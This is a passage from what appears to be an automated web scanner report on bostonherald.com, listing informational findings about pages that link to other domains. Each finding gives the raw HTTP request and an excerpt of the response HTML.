...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4847','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110120/stp/ef8a2d_KateA012011.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4832','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110116/stp/e02b29_460f81914ea92f01e20e6a7067008cba.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4810','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110112/stp/e9644b_fash2.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Patriot fashion"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Patriot fashion">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4786','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110106/stp/c846a1_010511cirquear01.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Cirque du Soleil"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Cirque du Soleil">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4783','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110105/stp/4df46a_010311skating03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Fashion on ice"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\Fashion on ice">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4767','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110101/stp/2d898c_120810princessnl05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\2010 in pictures"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Edge\\2010 in pictures">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4879','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/ed2891_012711hastynl05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Hasty Pudding"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Hasty Pudding">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4873','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110127/stp/ecbe1f_012610nkotbar04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\New Kids raid Fenway"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\New Kids raid Fenway">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4849','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110121/stp/1a0e4b_012011celtsnl03.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Paul Pierce reads to students"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\Paul Pierce reads to students">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4794','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110109/stp/d94239_010711folkap02.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4766','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101231/stp/d99d87_123110firstnightsc04.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\First Night 2011"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Track\\First Night 2011">Purchase</a>
...[SNIP]...
<div class="gutter_teaseInner" style="padding: 0px; padding-bottom:10px;" >

<img width="100%" src="http://multimedia.heraldinteractive.com/images/20110127/3057c6_Plow_01282011.jpg" />

<div style="padding: 0px 10px 0px 10px;">
...[SNIP]...
<p><a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/photo/?photo_name=3057c6_Plow_01282011" ><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mediacenter/btn_order_prints_yellow.png" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<span class="breadcrumb" ><img style="position:relative; top: 4px;" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery">Gallery</span>
...[SNIP]...
<li>
<a href="http://gallery.pictopia.com/bostonherald/"><h3>
...[SNIP]...
<div class="gutter_teaseInner">
<a href="http://gallery.pictopia.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/teaseBoxes/purchasePhotos.gif" /></a>
...[SNIP]...
<br />
<a href="http://gallery.pictopia.com/bostonherald/">Click here</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</body>

       <script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...

17.275. http://www.bostonherald.com/mediacenter/video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk

The response contains the following links to other domains:

http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js
http://objects.tremormedia.com/embed/js/embed.js

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk snow woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:58:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2589
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">

<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js"></script>
...[SNIP]...

17.276. http://www.bostonherald.com/mediacenter/video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=766783859001&rand=408

The response contains the following link to another domain:

http://admin.brightcove.com/js/BrightcoveExperiences.js

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2489
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

17.277. http://www.bostonherald.com/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/blogLogos/MediaBizBlog.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/cityDeskWired.gif
http://cache.heraldinteractive.com/images/siteImages/blogLogos/theLoneRepublican.gif
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/news/throwdown/FridayThrowdown0610_234x60.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news
http://feeds.feedburner.com/bostonherald/news/
http://feeds.feedburner.com/bostonherald/news/international/
http://feeds.feedburner.com/bostonherald/news/national/
http://feeds.feedburner.com/bostonherald/news/national/offbeat/
http://feeds.feedburner.com/bostonherald/news/national/politics/
http://feeds.feedburner.com/bostonherald/news/obituaries/
http://feeds.feedburner.com/bostonherald/news/opinion/
http://feeds.feedburner.com/bostonherald/news/opinion/columnists/
http://feeds.feedburner.com/bostonherald/news/regional/
http://feeds.feedburner.com/bostonherald/news/regional/politics/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110126/stp/be916e_geo_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/cc02b1_ltpRomneyA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/097956_ltpEgyptC012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/1c877a_missionary012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/da98aa_Shuttle_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/e20609_spalin012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.feedburner.com/fb/a/feed101
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.twitter.com/
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:18:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 105318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   

   <link rel="alternate" title="News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
<iframe style="position: relative; margin-bottom: 14px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312654"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/cc02b1_ltpRomneyA012811.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.278. http://www.bostonherald.com/news/columnists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/columnists/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/news/columnists/?srvc=home&position=active

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fcolumnists%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/columnists/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110122/stp/4f9728_Olbermann_01232011.jpg
http://multimedia.heraldinteractive.com/images/20110122/stp/a42f16_Pall_01232011.jpg
http://multimedia.heraldinteractive.com/images/20110122/stp/bff0cd_SWAT_01232011.jpg
